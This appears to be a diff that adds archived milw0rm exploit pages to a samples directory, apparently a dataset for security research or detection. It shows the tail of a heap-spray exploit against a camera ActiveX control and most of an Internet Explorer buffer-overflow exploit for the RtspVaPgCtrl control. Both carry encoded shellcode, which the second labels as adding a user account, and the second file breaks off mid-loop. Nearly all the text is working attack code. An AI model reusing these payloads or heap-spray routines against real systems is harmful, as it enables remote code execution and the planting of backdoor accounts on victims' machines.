+ "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
+ "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
+ "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
+ "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
+ "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
+ "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
+ "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
+ "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
+ "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
+ "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
+ "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
+ "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
+ "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
+ "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
+ "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
+ "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
+ "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
+ "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
+ "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
+ "%u7734%u4734%u4570");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<50;i++){memory[i] = block+shellcode}
+bigblock = unescape("%u0808%u0808");
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+for (i=50;i<100;i++){memory[i] = block+shellcode}
+bigblock = unescape("%u0c0c%u0c0c");
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+for (i=100;i<510;i++){memory[i] = block+shellcode}
+server="xxxxxxxx";
+user="";for (i=0;i<=9999;i++){user=user + unescape("%0d")}
+PTZCamPanelCtrl.ConnectServer(server,user);
+</script>
+</html>
+
+# milw0rm.com [2008-01-16]
82 samples/exploits/4932.html
@@ -0,0 +1,82 @@
+<!--
+Digital Data Communications RtspVaPgCtrl Class (RtspVapgDecoder.dll 1.1.0.29)
+remote buffer overflow (ie7/xp sp2)
+
+You may ask why I'm interested in theese untested/unpatched codecs,
+oh, well, I'm preparing a live scanner for clsid's, I mean not a fuzzer
+a framework which *choose* which control to exploit to see what happen,
+not blinding attack a common one. Even attackers have imagination,
+
+
+you know this?
+
+
+Someone should kill-bit theese codecs by os update and let you really
+choose which site can use them... this sound strange, or someone needs a
+backdoor always opened on IE? Oh, don't worry,
+
+joy and firewall bypass to the world.
+
+
+a site where you can find it: http://www.level1.com.au/demo.php
+my codebase: http://level1demo.dyndns.org:1030/RtspVaPgDec.cab
+
+rgod
+-
+stay tuned with us ...
+http://retrogod.altervista.org/join.html
+security feeds, radio streams, techno/drum & bass stations to come
+-->
+<html>
+<object classid='clsid:361E6B79-4A69-4376-B0F2-3D1EBEE9D7E2' id='RtspVaPgCtrl' /></object>
+<script language="javascript">
+///add su one, user: sun pass: tzu
+shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
+ "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
+ "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
+ "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
+ "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
+ "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
+ "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
+ "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
+ "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
+ "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
+ "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
+ "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
+ "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
+ "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
+ "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
+ "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
+ "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
+ "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
+ "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
+ "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
+ "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
+ "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
+ "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
+ "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
+ "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
+ "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
+ "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
+ "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
+ "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
+ "%u7734%u4734%u4570");
+bigblock = unescape("%00%09%09%00");//do not touch this
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<400;i++){memory[i] = block+shellcode}
+puf="";
+for (i=0;i<55;i++)